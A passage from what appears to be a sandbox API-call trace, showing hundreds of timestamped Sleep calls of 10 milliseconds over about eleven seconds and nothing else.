(dwMilliseconds=0xa) [0232.956] Sleep (dwMilliseconds=0xa) [0232.966] Sleep (dwMilliseconds=0xa) [0232.979] Sleep (dwMilliseconds=0xa) [0232.995] Sleep (dwMilliseconds=0xa) [0233.019] Sleep (dwMilliseconds=0xa) [0233.026] Sleep (dwMilliseconds=0xa) [0233.041] Sleep (dwMilliseconds=0xa) [0233.057] Sleep (dwMilliseconds=0xa) [0233.081] Sleep (dwMilliseconds=0xa) [0233.088] Sleep (dwMilliseconds=0xa) [0233.104] Sleep (dwMilliseconds=0xa) [0233.120] Sleep (dwMilliseconds=0xa) [0233.144] Sleep (dwMilliseconds=0xa) [0233.151] Sleep (dwMilliseconds=0xa) [0233.166] Sleep (dwMilliseconds=0xa) [0233.182] Sleep (dwMilliseconds=0xa) [0233.206] Sleep (dwMilliseconds=0xa) [0233.213] Sleep (dwMilliseconds=0xa) [0233.229] Sleep (dwMilliseconds=0xa) [0233.244] Sleep (dwMilliseconds=0xa) [0233.312] Sleep (dwMilliseconds=0xa) [0233.337] Sleep (dwMilliseconds=0xa) [0233.338] Sleep (dwMilliseconds=0xa) [0233.353] Sleep (dwMilliseconds=0xa) [0233.369] Sleep (dwMilliseconds=0xa) [0233.393] Sleep (dwMilliseconds=0xa) [0233.400] Sleep (dwMilliseconds=0xa) [0233.416] Sleep (dwMilliseconds=0xa) [0233.431] Sleep (dwMilliseconds=0xa) [0233.456] Sleep (dwMilliseconds=0xa) [0233.463] Sleep (dwMilliseconds=0xa) [0233.478] Sleep (dwMilliseconds=0xa) [0233.494] Sleep (dwMilliseconds=0xa) [0233.556] Sleep (dwMilliseconds=0xa) [0233.594] Sleep (dwMilliseconds=0xa) [0233.639] Sleep (dwMilliseconds=0xa) [0233.664] Sleep (dwMilliseconds=0xa) [0233.665] Sleep (dwMilliseconds=0xa) [0233.681] Sleep (dwMilliseconds=0xa) [0233.706] Sleep (dwMilliseconds=0xa) [0233.712] Sleep (dwMilliseconds=0xa) [0233.728] Sleep (dwMilliseconds=0xa) [0233.743] Sleep (dwMilliseconds=0xa) [0233.759] Sleep (dwMilliseconds=0xa) [0233.784] Sleep (dwMilliseconds=0xa) [0233.790] Sleep (dwMilliseconds=0xa) [0233.806] Sleep (dwMilliseconds=0xa) [0233.833] Sleep (dwMilliseconds=0xa) [0233.837] Sleep (dwMilliseconds=0xa) [0233.853] Sleep (dwMilliseconds=0xa) [0233.868] Sleep (dwMilliseconds=0xa) [0233.905] Sleep (dwMilliseconds=0xa) [0233.929] Sleep (dwMilliseconds=0xa) [0233.930] Sleep (dwMilliseconds=0xa) [0233.955] Sleep (dwMilliseconds=0xa) [0233.962] Sleep (dwMilliseconds=0xa) [0233.977] Sleep (dwMilliseconds=0xa) [0233.993] Sleep (dwMilliseconds=0xa) [0234.009] Sleep (dwMilliseconds=0xa) [0234.024] Sleep (dwMilliseconds=0xa) [0234.049] Sleep (dwMilliseconds=0xa) [0234.055] Sleep (dwMilliseconds=0xa) [0234.080] Sleep (dwMilliseconds=0xa) [0234.087] Sleep (dwMilliseconds=0xa) [0234.102] Sleep (dwMilliseconds=0xa) [0234.118] Sleep (dwMilliseconds=0xa) [0234.133] Sleep (dwMilliseconds=0xa) [0234.149] Sleep (dwMilliseconds=0xa) [0234.174] Sleep (dwMilliseconds=0xa) [0234.180] Sleep (dwMilliseconds=0xa) [0234.205] Sleep (dwMilliseconds=0xa) [0234.211] Sleep (dwMilliseconds=0xa) [0234.227] Sleep (dwMilliseconds=0xa) [0234.243] Sleep (dwMilliseconds=0xa) [0234.258] Sleep (dwMilliseconds=0xa) [0234.274] Sleep (dwMilliseconds=0xa) [0234.308] Sleep (dwMilliseconds=0xa) [0234.332] Sleep (dwMilliseconds=0xa) [0234.368] Sleep (dwMilliseconds=0xa) [0234.383] Sleep (dwMilliseconds=0xa) [0234.398] Sleep (dwMilliseconds=0xa) [0234.414] Sleep (dwMilliseconds=0xa) [0234.439] Sleep (dwMilliseconds=0xa) [0234.463] Sleep (dwMilliseconds=0xa) [0234.477] Sleep (dwMilliseconds=0xa) [0234.492] Sleep (dwMilliseconds=0xa) [0234.508] Sleep (dwMilliseconds=0xa) [0234.524] Sleep (dwMilliseconds=0xa) [0234.539] Sleep (dwMilliseconds=0xa) [0234.566] Sleep (dwMilliseconds=0xa) [0234.570] Sleep (dwMilliseconds=0xa) [0234.594] Sleep (dwMilliseconds=0xa) [0234.601] Sleep (dwMilliseconds=0xa) [0234.647] Sleep (dwMilliseconds=0xa) [0234.648] Sleep (dwMilliseconds=0xa) [0234.683] Sleep (dwMilliseconds=0xa) [0234.708] Sleep (dwMilliseconds=0xa) [0234.732] Sleep (dwMilliseconds=0xa) [0234.742] Sleep (dwMilliseconds=0xa) [0234.758] Sleep (dwMilliseconds=0xa) [0234.773] Sleep (dwMilliseconds=0xa) [0234.788] Sleep (dwMilliseconds=0xa) [0234.804] Sleep (dwMilliseconds=0xa) [0234.829] Sleep (dwMilliseconds=0xa) [0234.835] Sleep (dwMilliseconds=0xa) [0234.859] Sleep (dwMilliseconds=0xa) [0234.867] Sleep (dwMilliseconds=0xa) [0234.882] Sleep (dwMilliseconds=0xa) [0234.898] Sleep (dwMilliseconds=0xa) [0234.913] Sleep (dwMilliseconds=0xa) [0234.950] Sleep (dwMilliseconds=0xa) [0234.974] Sleep (dwMilliseconds=0xa) [0234.999] Sleep (dwMilliseconds=0xa) [0235.007] Sleep (dwMilliseconds=0xa) [0235.022] Sleep (dwMilliseconds=0xa) [0235.038] Sleep (dwMilliseconds=0xa) [0235.054] Sleep (dwMilliseconds=0xa) [0235.069] Sleep (dwMilliseconds=0xa) [0235.094] Sleep (dwMilliseconds=0xa) [0235.100] Sleep (dwMilliseconds=0xa) [0235.124] Sleep (dwMilliseconds=0xa) [0235.132] Sleep (dwMilliseconds=0xa) [0235.147] Sleep (dwMilliseconds=0xa) [0235.163] Sleep (dwMilliseconds=0xa) [0235.179] Sleep (dwMilliseconds=0xa) [0235.194] Sleep (dwMilliseconds=0xa) [0235.219] Sleep (dwMilliseconds=0xa) [0235.225] Sleep (dwMilliseconds=0xa) [0235.251] Sleep (dwMilliseconds=0xa) [0235.256] Sleep (dwMilliseconds=0xa) [0235.272] Sleep (dwMilliseconds=0xa) [0235.297] Sleep (dwMilliseconds=0xa) [0235.303] Sleep (dwMilliseconds=0xa) [0235.319] Sleep (dwMilliseconds=0xa) [0235.343] Sleep (dwMilliseconds=0xa) [0235.350] Sleep (dwMilliseconds=0xa) [0235.375] Sleep (dwMilliseconds=0xa) [0235.381] Sleep (dwMilliseconds=0xa) [0235.417] Sleep (dwMilliseconds=0xa) [0235.428] Sleep (dwMilliseconds=0xa) [0235.444] Sleep (dwMilliseconds=0xa) [0235.467] Sleep (dwMilliseconds=0xa) [0235.475] Sleep (dwMilliseconds=0xa) [0235.499] Sleep (dwMilliseconds=0xa) [0235.506] Sleep (dwMilliseconds=0xa) [0235.522] Sleep (dwMilliseconds=0xa) [0235.537] Sleep (dwMilliseconds=0xa) [0235.553] Sleep (dwMilliseconds=0xa) [0235.569] Sleep (dwMilliseconds=0xa) [0235.592] Sleep (dwMilliseconds=0xa) [0235.600] Sleep (dwMilliseconds=0xa) [0235.624] Sleep (dwMilliseconds=0xa) [0235.631] Sleep (dwMilliseconds=0xa) [0235.656] Sleep (dwMilliseconds=0xa) [0235.689] Sleep (dwMilliseconds=0xa) [0235.694] Sleep (dwMilliseconds=0xa) [0235.753] Sleep (dwMilliseconds=0xa) [0235.777] Sleep (dwMilliseconds=0xa) [0235.787] Sleep (dwMilliseconds=0xa) [0235.803] Sleep (dwMilliseconds=0xa) [0235.818] Sleep (dwMilliseconds=0xa) [0235.843] Sleep (dwMilliseconds=0xa) [0235.849] Sleep (dwMilliseconds=0xa) [0235.865] Sleep (dwMilliseconds=0xa) [0235.883] Sleep (dwMilliseconds=0xa) [0235.907] Sleep (dwMilliseconds=0xa) [0235.912] Sleep (dwMilliseconds=0xa) [0235.927] Sleep (dwMilliseconds=0xa) [0235.943] Sleep (dwMilliseconds=0xa) [0235.968] Sleep (dwMilliseconds=0xa) [0236.004] Sleep (dwMilliseconds=0xa) [0236.006] Sleep (dwMilliseconds=0xa) [0236.030] Sleep (dwMilliseconds=0xa) [0236.037] Sleep (dwMilliseconds=0xa) [0236.052] Sleep (dwMilliseconds=0xa) [0236.068] Sleep (dwMilliseconds=0xa) [0236.092] Sleep (dwMilliseconds=0xa) [0236.099] Sleep (dwMilliseconds=0xa) [0236.115] Sleep (dwMilliseconds=0xa) [0236.130] Sleep (dwMilliseconds=0xa) [0236.155] Sleep (dwMilliseconds=0xa) [0236.161] Sleep (dwMilliseconds=0xa) [0236.177] Sleep (dwMilliseconds=0xa) [0236.193] Sleep (dwMilliseconds=0xa) [0236.216] Sleep (dwMilliseconds=0xa) [0236.224] Sleep (dwMilliseconds=0xa) [0236.239] Sleep (dwMilliseconds=0xa) [0236.255] Sleep (dwMilliseconds=0xa) [0236.280] Sleep (dwMilliseconds=0xa) [0236.295] Sleep (dwMilliseconds=0xa) [0236.302] Sleep (dwMilliseconds=0xa) [0236.317] Sleep (dwMilliseconds=0xa) [0236.342] Sleep (dwMilliseconds=0xa) [0236.350] Sleep (dwMilliseconds=0xa) [0236.364] Sleep (dwMilliseconds=0xa) [0236.380] Sleep (dwMilliseconds=0xa) [0236.404] Sleep (dwMilliseconds=0xa) [0236.411] Sleep (dwMilliseconds=0xa) [0236.427] Sleep (dwMilliseconds=0xa) [0236.462] Sleep (dwMilliseconds=0xa) [0236.486] Sleep (dwMilliseconds=0xa) [0236.489] Sleep (dwMilliseconds=0xa) [0236.505] Sleep (dwMilliseconds=0xa) [0236.528] Sleep (dwMilliseconds=0xa) [0236.536] Sleep (dwMilliseconds=0xa) [0236.552] Sleep (dwMilliseconds=0xa) [0236.567] Sleep (dwMilliseconds=0xa) [0236.583] Sleep (dwMilliseconds=0xa) [0236.607] Sleep (dwMilliseconds=0xa) [0236.614] Sleep (dwMilliseconds=0xa) [0236.629] Sleep (dwMilliseconds=0xa) [0236.653] Sleep (dwMilliseconds=0xa) [0236.682] Sleep (dwMilliseconds=0xa) [0236.692] Sleep (dwMilliseconds=0xa) [0236.708] Sleep (dwMilliseconds=0xa) [0236.743] Sleep (dwMilliseconds=0xa) [0236.767] Sleep (dwMilliseconds=0xa) [0236.770] Sleep (dwMilliseconds=0xa) [0236.830] Sleep (dwMilliseconds=0xa) [0236.832] Sleep (dwMilliseconds=0xa) [0236.848] Sleep (dwMilliseconds=0xa) [0236.863] Sleep (dwMilliseconds=0xa) [0236.888] Sleep (dwMilliseconds=0xa) [0236.895] Sleep (dwMilliseconds=0xa) [0236.918] Sleep (dwMilliseconds=0xa) [0236.926] Sleep (dwMilliseconds=0xa) [0236.942] Sleep (dwMilliseconds=0xa) [0236.959] Sleep (dwMilliseconds=0xa) [0236.972] Sleep (dwMilliseconds=0xa) [0236.988] Sleep (dwMilliseconds=0xa) [0237.013] Sleep (dwMilliseconds=0xa) [0237.019] Sleep (dwMilliseconds=0xa) [0237.081] Sleep (dwMilliseconds=0xa) [0237.082] Sleep (dwMilliseconds=0xa) [0237.099] Sleep (dwMilliseconds=0xa) [0237.113] Sleep (dwMilliseconds=0xa) [0237.137] Sleep (dwMilliseconds=0xa) [0237.144] Sleep (dwMilliseconds=0xa) [0237.168] Sleep (dwMilliseconds=0xa) [0237.175] Sleep (dwMilliseconds=0xa) [0237.191] Sleep (dwMilliseconds=0xa) [0237.207] Sleep (dwMilliseconds=0xa) [0237.222] Sleep (dwMilliseconds=0xa) [0237.238] Sleep (dwMilliseconds=0xa) [0237.261] Sleep (dwMilliseconds=0xa) [0237.269] Sleep (dwMilliseconds=0xa) [0237.292] Sleep (dwMilliseconds=0xa) [0237.315] Sleep (dwMilliseconds=0xa) [0237.316] Sleep (dwMilliseconds=0xa) [0237.331] Sleep (dwMilliseconds=0xa) [0237.347] Sleep (dwMilliseconds=0xa) [0237.363] Sleep (dwMilliseconds=0xa) [0237.389] Sleep (dwMilliseconds=0xa) [0237.394] Sleep (dwMilliseconds=0xa) [0237.418] Sleep (dwMilliseconds=0xa) [0237.425] Sleep (dwMilliseconds=0xa) [0237.441] Sleep (dwMilliseconds=0xa) [0237.456] Sleep (dwMilliseconds=0xa) [0237.472] Sleep (dwMilliseconds=0xa) [0237.489] Sleep (dwMilliseconds=0xa) [0237.550] Sleep (dwMilliseconds=0xa) [0237.575] Sleep (dwMilliseconds=0xa) [0237.581] Sleep (dwMilliseconds=0xa) [0237.597] Sleep (dwMilliseconds=0xa) [0237.612] Sleep (dwMilliseconds=0xa) [0237.636] Sleep (dwMilliseconds=0xa) [0237.643] Sleep (dwMilliseconds=0xa) [0237.659] Sleep (dwMilliseconds=0xa) [0237.684] Sleep (dwMilliseconds=0xa) [0237.709] Sleep (dwMilliseconds=0xa) [0237.721] Sleep (dwMilliseconds=0xa) [0237.737] Sleep (dwMilliseconds=0xa) [0237.761] Sleep (dwMilliseconds=0xa) [0237.794] Sleep (dwMilliseconds=0xa) [0237.799] Sleep (dwMilliseconds=0xa) [0237.815] Sleep (dwMilliseconds=0xa) [0237.839] Sleep (dwMilliseconds=0xa) [0237.873] Sleep (dwMilliseconds=0xa) [0237.899] Sleep (dwMilliseconds=0xa) [0237.909] Sleep (dwMilliseconds=0xa) [0237.924] Sleep (dwMilliseconds=0xa) [0237.940] Sleep (dwMilliseconds=0xa) [0237.964] Sleep (dwMilliseconds=0xa) [0237.971] Sleep (dwMilliseconds=0xa) [0237.987] Sleep (dwMilliseconds=0xa) [0238.002] Sleep (dwMilliseconds=0xa) [0238.026] Sleep (dwMilliseconds=0xa) [0238.033] Sleep (dwMilliseconds=0xa) [0238.049] Sleep (dwMilliseconds=0xa) [0238.065] Sleep (dwMilliseconds=0xa) [0238.088] Sleep (dwMilliseconds=0xa) [0238.124] Sleep (dwMilliseconds=0xa) [0238.127] Sleep (dwMilliseconds=0xa) [0238.151] Sleep (dwMilliseconds=0xa) [0238.158] Sleep (dwMilliseconds=0xa) [0238.174] Sleep (dwMilliseconds=0xa) [0238.189] Sleep (dwMilliseconds=0xa) [0238.213] Sleep (dwMilliseconds=0xa) [0238.221] Sleep (dwMilliseconds=0xa) [0238.236] Sleep (dwMilliseconds=0xa) [0238.252] Sleep (dwMilliseconds=0xa) [0238.275] Sleep (dwMilliseconds=0xa) [0238.283] Sleep (dwMilliseconds=0xa) [0238.309] Sleep (dwMilliseconds=0xa) [0238.314] Sleep (dwMilliseconds=0xa) [0238.338] Sleep (dwMilliseconds=0xa) [0238.345] Sleep (dwMilliseconds=0xa) [0238.361] Sleep (dwMilliseconds=0xa) [0238.377] Sleep (dwMilliseconds=0xa) [0238.400] Sleep (dwMilliseconds=0xa) [0238.408] Sleep (dwMilliseconds=0xa) [0238.423] Sleep (dwMilliseconds=0xa) [0238.439] Sleep (dwMilliseconds=0xa) [0238.462] Sleep (dwMilliseconds=0xa) [0238.470] Sleep (dwMilliseconds=0xa) [0238.486] Sleep (dwMilliseconds=0xa) [0238.501] Sleep (dwMilliseconds=0xa) [0238.525] Sleep (dwMilliseconds=0xa) [0238.533] Sleep (dwMilliseconds=0xa) [0238.548] Sleep (dwMilliseconds=0xa) [0238.564] Sleep (dwMilliseconds=0xa) [0238.587] Sleep (dwMilliseconds=0xa) [0238.623] Sleep (dwMilliseconds=0xa) [0238.626] Sleep (dwMilliseconds=0xa) [0238.650] Sleep (dwMilliseconds=0xa) [0238.657] Sleep (dwMilliseconds=0xa) [0238.673] Sleep (dwMilliseconds=0xa) [0238.698] Sleep (dwMilliseconds=0xa) [0238.726] Sleep (dwMilliseconds=0xa) [0238.735] Sleep (dwMilliseconds=0xa) [0238.751] Sleep (dwMilliseconds=0xa) [0238.775] Sleep (dwMilliseconds=0xa) [0238.782] Sleep (dwMilliseconds=0xa) [0238.798] Sleep (dwMilliseconds=0xa) [0238.832] Sleep (dwMilliseconds=0xa) [0238.855] Sleep (dwMilliseconds=0xa) [0238.860] Sleep (dwMilliseconds=0xa) [0238.876] Sleep (dwMilliseconds=0xa) [0238.936] Sleep (dwMilliseconds=0xa) [0238.938] Sleep (dwMilliseconds=0xa) [0238.954] Sleep (dwMilliseconds=0xa) [0238.978] Sleep (dwMilliseconds=0xa) [0238.985] Sleep (dwMilliseconds=0xa) [0239.001] Sleep (dwMilliseconds=0xa) [0239.024] Sleep (dwMilliseconds=0xa) [0239.032] Sleep (dwMilliseconds=0xa) [0239.047] Sleep (dwMilliseconds=0xa) [0239.063] Sleep (dwMilliseconds=0xa) [0239.079] Sleep (dwMilliseconds=0xa) [0239.102] Sleep (dwMilliseconds=0xa) [0239.110] Sleep (dwMilliseconds=0xa) [0239.125] Sleep (dwMilliseconds=0xa) [0239.184] Sleep (dwMilliseconds=0xa) [0239.188] Sleep (dwMilliseconds=0xa) [0239.203] Sleep (dwMilliseconds=0xa) [0239.227] Sleep (dwMilliseconds=0xa) [0239.235] Sleep (dwMilliseconds=0xa) [0239.250] Sleep (dwMilliseconds=0xa) [0239.273] Sleep (dwMilliseconds=0xa) [0239.284] Sleep (dwMilliseconds=0xa) [0239.297] Sleep (dwMilliseconds=0xa) [0239.324] Sleep (dwMilliseconds=0xa) [0239.328] Sleep (dwMilliseconds=0xa) [0239.353] Sleep (dwMilliseconds=0xa) [0239.359] Sleep (dwMilliseconds=0xa) [0239.375] Sleep (dwMilliseconds=0xa) [0239.399] Sleep (dwMilliseconds=0xa) [0239.406] Sleep (dwMilliseconds=0xa) [0239.422] Sleep (dwMilliseconds=0xa) [0239.437] Sleep (dwMilliseconds=0xa) [0239.453] Sleep (dwMilliseconds=0xa) [0239.477] Sleep (dwMilliseconds=0xa) [0239.484] Sleep (dwMilliseconds=0xa) [0239.500] Sleep (dwMilliseconds=0xa) [0239.524] Sleep (dwMilliseconds=0xa) [0239.531] Sleep (dwMilliseconds=0xa) [0239.546] Sleep (dwMilliseconds=0xa) [0239.562] Sleep (dwMilliseconds=0xa) [0239.578] Sleep (dwMilliseconds=0xa) [0239.602] Sleep (dwMilliseconds=0xa) [0239.609] Sleep (dwMilliseconds=0xa) [0239.625] Sleep (dwMilliseconds=0xa) [0239.684] Sleep (dwMilliseconds=0xa) [0239.687] Sleep (dwMilliseconds=0xa) [0239.715] Sleep (dwMilliseconds=0xa) [0239.739] Sleep (dwMilliseconds=0xa) [0239.749] Sleep (dwMilliseconds=0xa) [0239.773] Sleep (dwMilliseconds=0xa) [0239.781] Sleep (dwMilliseconds=0xa) [0239.796] Sleep (dwMilliseconds=0xa) [0239.819] Sleep (dwMilliseconds=0xa) [0239.828] Sleep (dwMilliseconds=0xa) [0239.843] Sleep (dwMilliseconds=0xa) [0239.900] Sleep (dwMilliseconds=0xa) [0239.924] Sleep (dwMilliseconds=0xa) [0239.937] Sleep (dwMilliseconds=0xa) [0239.974] Sleep (dwMilliseconds=0xa) [0239.998] Sleep (dwMilliseconds=0xa) [0239.999] Sleep (dwMilliseconds=0xa) [0240.015] Sleep (dwMilliseconds=0xa) [0240.030] Sleep (dwMilliseconds=0xa) [0240.054] Sleep (dwMilliseconds=0xa) [0240.062] Sleep (dwMilliseconds=0xa) [0240.077] Sleep (dwMilliseconds=0xa) [0240.095] Sleep (dwMilliseconds=0xa) [0240.118] Sleep (dwMilliseconds=0xa) [0240.124] Sleep (dwMilliseconds=0xa) [0240.140] Sleep (dwMilliseconds=0xa) [0240.155] Sleep (dwMilliseconds=0xa) [0240.179] Sleep (dwMilliseconds=0xa) [0240.188] Sleep (dwMilliseconds=0xa) [0240.224] Sleep (dwMilliseconds=0xa) [0240.247] Sleep (dwMilliseconds=0xa) [0240.248] Sleep (dwMilliseconds=0xa) [0240.264] Sleep (dwMilliseconds=0xa) [0240.280] Sleep (dwMilliseconds=0xa) [0240.303] Sleep (dwMilliseconds=0xa) [0240.320] Sleep (dwMilliseconds=0xa) [0240.327] Sleep (dwMilliseconds=0xa) [0240.342] Sleep (dwMilliseconds=0xa) [0240.367] Sleep (dwMilliseconds=0xa) [0240.373] Sleep (dwMilliseconds=0xa) [0240.389] Sleep (dwMilliseconds=0xa) [0240.405] Sleep (dwMilliseconds=0xa) [0240.428] Sleep (dwMilliseconds=0xa) [0240.436] Sleep (dwMilliseconds=0xa) [0240.451] Sleep (dwMilliseconds=0xa) [0240.467] Sleep (dwMilliseconds=0xa) [0240.491] Sleep (dwMilliseconds=0xa) [0240.498] Sleep (dwMilliseconds=0xa) [0240.514] Sleep (dwMilliseconds=0xa) [0240.529] Sleep (dwMilliseconds=0xa) [0240.553] Sleep (dwMilliseconds=0xa) [0240.561] Sleep (dwMilliseconds=0xa) [0240.576] Sleep (dwMilliseconds=0xa) [0240.592] Sleep (dwMilliseconds=0xa) [0240.615] Sleep (dwMilliseconds=0xa) [0240.623] Sleep (dwMilliseconds=0xa) [0240.639] Sleep (dwMilliseconds=0xa) [0240.654] Sleep (dwMilliseconds=0xa) [0240.678] Sleep (dwMilliseconds=0xa) [0240.685] Sleep (dwMilliseconds=0xa) [0240.721] Sleep (dwMilliseconds=0xa) [0240.755] Sleep (dwMilliseconds=0xa) [0240.763] Sleep (dwMilliseconds=0xa) [0240.779] Sleep (dwMilliseconds=0xa) [0240.803] Sleep (dwMilliseconds=0xa) [0240.811] Sleep (dwMilliseconds=0xa) [0240.826] Sleep (dwMilliseconds=0xa) [0240.841] Sleep (dwMilliseconds=0xa) [0240.857] Sleep (dwMilliseconds=0xa) [0240.881] Sleep (dwMilliseconds=0xa) [0240.888] Sleep (dwMilliseconds=0xa) [0240.904] Sleep (dwMilliseconds=0xa) [0240.962] Sleep (dwMilliseconds=0xa) [0240.967] Sleep (dwMilliseconds=0xa) [0240.982] Sleep (dwMilliseconds=0xa) [0241.039] Sleep (dwMilliseconds=0xa) [0241.063] Sleep (dwMilliseconds=0xa) [0241.075] Sleep (dwMilliseconds=0xa) [0241.091] Sleep (dwMilliseconds=0xa) [0241.107] Sleep (dwMilliseconds=0xa) [0241.130] Sleep (dwMilliseconds=0xa) [0241.138] Sleep (dwMilliseconds=0xa) [0241.153] Sleep (dwMilliseconds=0xa) [0241.169] Sleep (dwMilliseconds=0xa) [0241.193] Sleep (dwMilliseconds=0xa) [0241.200] Sleep (dwMilliseconds=0xa) [0241.216] Sleep (dwMilliseconds=0xa) [0241.231] Sleep (dwMilliseconds=0xa) [0241.292] Sleep (dwMilliseconds=0xa) [0241.294] Sleep (dwMilliseconds=0xa) [0241.327] Sleep (dwMilliseconds=0xa) [0241.341] Sleep (dwMilliseconds=0xa) [0241.356] Sleep (dwMilliseconds=0xa) [0241.381] Sleep (dwMilliseconds=0xa) [0241.387] Sleep (dwMilliseconds=0xa) [0241.403] Sleep (dwMilliseconds=0xa) [0241.419] Sleep (dwMilliseconds=0xa) [0241.434] Sleep (dwMilliseconds=0xa) [0241.458] Sleep (dwMilliseconds=0xa) [0241.465] Sleep (dwMilliseconds=0xa) [0241.481] Sleep (dwMilliseconds=0xa) [0241.513] Sleep (dwMilliseconds=0xa) [0241.528] Sleep (dwMilliseconds=0xa) [0241.543] Sleep (dwMilliseconds=0xa) [0241.559] Sleep (dwMilliseconds=0xa) [0241.583] Sleep (dwMilliseconds=0xa) [0241.590] Sleep (dwMilliseconds=0xa) [0241.606] Sleep (dwMilliseconds=0xa) [0241.622] Sleep (dwMilliseconds=0xa) [0241.646] Sleep (dwMilliseconds=0xa) [0241.653] Sleep (dwMilliseconds=0xa) [0241.669] Sleep (dwMilliseconds=0xa) [0241.684] Sleep (dwMilliseconds=0xa) [0241.712] Sleep (dwMilliseconds=0xa) [0241.715] Sleep (dwMilliseconds=0xa) [0241.731] Sleep (dwMilliseconds=0xa) [0241.777] Sleep (dwMilliseconds=0xa) [0241.805] Sleep (dwMilliseconds=0xa) [0241.809] Sleep (dwMilliseconds=0xa) [0241.833] Sleep (dwMilliseconds=0xa) [0241.840] Sleep (dwMilliseconds=0xa) [0241.855] Sleep (dwMilliseconds=0xa) [0241.871] Sleep (dwMilliseconds=0xa) [0241.887] Sleep (dwMilliseconds=0xa) [0241.902] Sleep (dwMilliseconds=0xa) [0241.926] Sleep (dwMilliseconds=0xa) [0241.933] Sleep (dwMilliseconds=0xa) [0241.958] Sleep (dwMilliseconds=0xa) [0241.965] Sleep (dwMilliseconds=0xa) [0242.001] Sleep (dwMilliseconds=0xa) [0242.015] Sleep (dwMilliseconds=0xa) [0242.027] Sleep (dwMilliseconds=0xa) [0242.051] Sleep (dwMilliseconds=0xa) [0242.087] Sleep (dwMilliseconds=0xa) [0242.112] Sleep (dwMilliseconds=0xa) [0242.121] Sleep (dwMilliseconds=0xa) [0242.136] Sleep (dwMilliseconds=0xa) [0242.152] Sleep (dwMilliseconds=0xa) [0242.176] Sleep (dwMilliseconds=0xa) [0242.184] Sleep (dwMilliseconds=0xa) [0242.199] Sleep (dwMilliseconds=0xa) [0242.214] Sleep (dwMilliseconds=0xa) [0242.238] Sleep (dwMilliseconds=0xa) [0242.245] Sleep (dwMilliseconds=0xa) [0242.261] Sleep (dwMilliseconds=0xa) [0242.277] Sleep (dwMilliseconds=0xa) [0242.301] Sleep (dwMilliseconds=0xa) [0242.347] Sleep (dwMilliseconds=0xa) [0242.374] Sleep (dwMilliseconds=0xa) [0242.386] Sleep (dwMilliseconds=0xa) [0242.401] Sleep (dwMilliseconds=0xa) [0242.425] Sleep (dwMilliseconds=0xa) [0242.432] Sleep (dwMilliseconds=0xa) [0242.448] Sleep (dwMilliseconds=0xa) [0242.464] Sleep (dwMilliseconds=0xa) [0242.480] Sleep (dwMilliseconds=0xa) [0242.504] Sleep (dwMilliseconds=0xa) [0242.510] Sleep (dwMilliseconds=0xa) [0242.526] Sleep (dwMilliseconds=0xa) [0242.550] Sleep (dwMilliseconds=0xa) [0242.557] Sleep (dwMilliseconds=0xa) [0242.573] Sleep (dwMilliseconds=0xa) [0242.589] Sleep (dwMilliseconds=0xa) [0242.604] Sleep (dwMilliseconds=0xa) [0242.628] Sleep (dwMilliseconds=0xa) [0242.636] Sleep (dwMilliseconds=0xa) [0242.651] Sleep (dwMilliseconds=0xa) [0242.675] Sleep (dwMilliseconds=0xa) [0242.682] Sleep (dwMilliseconds=0xa) [0242.699] Sleep (dwMilliseconds=0xa) [0242.713] Sleep (dwMilliseconds=0xa) [0242.729] Sleep (dwMilliseconds=0xa) [0242.753] Sleep (dwMilliseconds=0xa) [0242.766] Sleep (dwMilliseconds=0xa) [0242.776] Sleep (dwMilliseconds=0xa) [0242.800] Sleep (dwMilliseconds=0xa) [0242.807] Sleep (dwMilliseconds=0xa) [0242.842] Sleep (dwMilliseconds=0xa) [0242.854] Sleep (dwMilliseconds=0xa) [0242.877] Sleep (dwMilliseconds=0xa) [0242.885] Sleep (dwMilliseconds=0xa) [0242.901] Sleep (dwMilliseconds=0xa) [0242.925] Sleep (dwMilliseconds=0xa) [0242.932] Sleep (dwMilliseconds=0xa) [0242.948] Sleep (dwMilliseconds=0xa) [0242.963] Sleep (dwMilliseconds=0xa) [0242.979] Sleep (dwMilliseconds=0xa) [0243.002] Sleep (dwMilliseconds=0xa) [0243.010] Sleep (dwMilliseconds=0xa) [0243.045] Sleep (dwMilliseconds=0xa) [0243.069] Sleep (dwMilliseconds=0xa) [0243.072] Sleep (dwMilliseconds=0xa) [0243.088] Sleep (dwMilliseconds=0xa) [0243.122] Sleep (dwMilliseconds=0xa) [0243.146] Sleep (dwMilliseconds=0xa) [0243.150] Sleep (dwMilliseconds=0xa) [0243.166] Sleep (dwMilliseconds=0xa) [0243.190] Sleep (dwMilliseconds=0xa) [0243.197] Sleep (dwMilliseconds=0xa) [0243.213] Sleep (dwMilliseconds=0xa) [0243.228] Sleep (dwMilliseconds=0xa) [0243.244] Sleep (dwMilliseconds=0xa) [0243.267] Sleep (dwMilliseconds=0xa) [0243.275] Sleep (dwMilliseconds=0xa) [0243.291] Sleep (dwMilliseconds=0xa) [0243.324] Sleep (dwMilliseconds=0xa) [0243.338] Sleep (dwMilliseconds=0xa) [0243.353] Sleep (dwMilliseconds=0xa) [0243.389] Sleep (dwMilliseconds=0xa) [0243.413] Sleep (dwMilliseconds=0xa) [0243.417] Sleep (dwMilliseconds=0xa) [0243.431] Sleep (dwMilliseconds=0xa) [0243.455] Sleep (dwMilliseconds=0xa) [0243.462] Sleep (dwMilliseconds=0xa) [0243.478] Sleep (dwMilliseconds=0xa) [0243.493] Sleep (dwMilliseconds=0xa) [0243.509] Sleep (dwMilliseconds=0xa) [0243.533] Sleep (dwMilliseconds=0xa) [0243.540] Sleep (dwMilliseconds=0xa) [0243.556] Sleep (dwMilliseconds=0xa) [0243.579] Sleep (dwMilliseconds=0xa) [0243.587] Sleep (dwMilliseconds=0xa) [0243.603] Sleep (dwMilliseconds=0xa) [0243.618] Sleep (dwMilliseconds=0xa) [0243.634] Sleep (dwMilliseconds=0xa) [0243.658] Sleep (dwMilliseconds=0xa) [0243.665] Sleep (dwMilliseconds=0xa) [0243.681] Sleep (dwMilliseconds=0xa) [0243.704] Sleep (dwMilliseconds=0xa) [0243.712] Sleep (dwMilliseconds=0xa) [0243.727] Sleep (dwMilliseconds=0xa) [0243.743] Sleep (dwMilliseconds=0xa) [0243.769] Sleep (dwMilliseconds=0xa) [0243.794] Sleep (dwMilliseconds=0xa) [0243.807] Sleep (dwMilliseconds=0xa) [0243.831] Sleep (dwMilliseconds=0xa) [0243.836] Sleep (dwMilliseconds=0xa) [0243.852] Sleep (dwMilliseconds=0xa) [0243.887] Sleep (dwMilliseconds=0xa) [0243.899] Sleep (dwMilliseconds=0xa) [0243.922] Sleep (dwMilliseconds=0xa) [0243.930] Sleep (dwMilliseconds=0xa) [0243.954] 